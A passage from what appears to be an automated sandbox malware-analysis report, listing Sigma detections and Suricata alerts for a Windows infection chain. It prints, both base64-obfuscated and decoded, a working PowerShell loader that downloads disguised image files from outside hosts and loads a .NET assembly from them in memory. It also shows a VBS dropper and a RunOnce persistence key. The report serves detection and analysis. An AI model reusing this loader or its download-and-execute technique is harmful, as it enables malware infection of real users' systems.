aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@C
                            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@C
                            Sigma detected: Script Interpreter Execution From Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67c2163c9db39.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2908, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , ProcessId: 2352, ProcessName: wscript.exe
                            Sigma detected: Silenttrinity Stager Msbuild Activity
                            Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.21.64.1, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 4600, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49976
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67c2163c9db39.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2908, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , ProcessId: 2352, ProcessName: wscript.exe
                            Sigma detected: WScript or CScript Dropper
                            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67c2163c9db39.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2908, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , ProcessId: 2352, ProcessName: wscript.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe, ProcessId: 2500, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                            Sigma detected: Usage Of Web Request Commands And Cmdlets
                            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $en
                            Sigma detected: Use Short Name Path in Command Line
                            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp, ParentCommandLine: "C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe", ParentImage: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe, ParentProcessId: 1888, ParentProcessName: N7LnRW81Rfq.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" , ProcessId: 2044, ProcessName: N7LnRW81Rfq.tmp
                            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67c2163c9db39.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2908, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , ProcessId: 2352, ProcessName: wscript.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@C
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 4832, ProcessName: svchost.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Powershell download and load assembly
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $en

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-01T09:48:38.328288+010020283713Unknown Traffic192.168.2.749976104.21.64.1443TCP
                            2025-03-01T09:48:38.977174+010020283713Unknown Traffic192.168.2.749977104.21.64.1443TCP
                            2025-03-01T09:48:41.317114+010020283713Unknown Traffic192.168.2.749978104.21.64.1443TCP
                            2025-03-01T09:48:49.233348+010020283713Unknown Traffic192.168.2.749979104.21.64.1443TCP
                            2025-03-01T09:48:50.472820+010020283713Unknown Traffic192.168.2.749980104.21.64.1443TCP
                            2025-03-01T09:48:51.830375+010020283713Unknown Traffic192.168.2.749981104.21.64.1443TCP
                            2025-03-01T09:48:53.122463+010020283713Unknown Traffic192.168.2.749982104.21.64.1443TCP
                            2025-03-01T09:49:04.316239+010020283713Unknown Traffic192.168.2.749983104.21.64.1443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-01T09:49:13.872893+010020287653Unknown Traffic192.168.2.749984176.113.115.96443TCP
                            2025-03-01T09:49:17.854929+010020287653Unknown Traffic192.168.2.749986176.113.115.96443TCP
